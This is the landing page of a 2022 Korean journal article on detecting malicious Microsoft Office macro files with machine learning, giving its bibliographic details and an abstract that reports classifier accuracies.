본문 바로가기
  • Home

OLE File Analysis and Malware Detection using Machine Learning

  • Journal of The Korea Society of Computer and Information
  • Abbr : JKSCI
  • 2022, 27(5), pp.149-156
  • DOI : 10.9708/jksci.2022.27.05.149
  • Publisher : The Korean Society Of Computer And Information
  • Research Area : Engineering > Computer Science
  • Received : March 18, 2022
  • Accepted : April 29, 2022
  • Published : May 31, 2022

Hyeong Kyu Choi 1 Ah Reum Kang 1

1배재대학교

Accredited

ABSTRACT

Recently, there have been many reports of document-type malicious code injecting malicious code into Microsoft Office files. Document-type malicious code is often hidden by encoding the malicious code in the document. Therefore, document-type malware can easily bypass anti-virus programs. We found that malicious code was inserted into the Visual Basic for Applications (VBA) macro, a function supported by Microsoft Office. Malicious codes such as shellcodes that run external programs and URL-related codes that download files from external URLs were identified. We selected 354 keywords repeatedly appearing in malicious Microsoft Office files and defined the number of times each keyword appears in the body of the document as a feature. We performed machine learning with SVM, naïve Bayes, logistic regression, and random forest algorithms. As a result, each algorithm showed accuracies of 0.994, 0.659, 0.995, and 0.998, respectively.

Citation status

* References for papers published after 2023 are currently being built.

This paper was written with support from the National Research Foundation of Korea.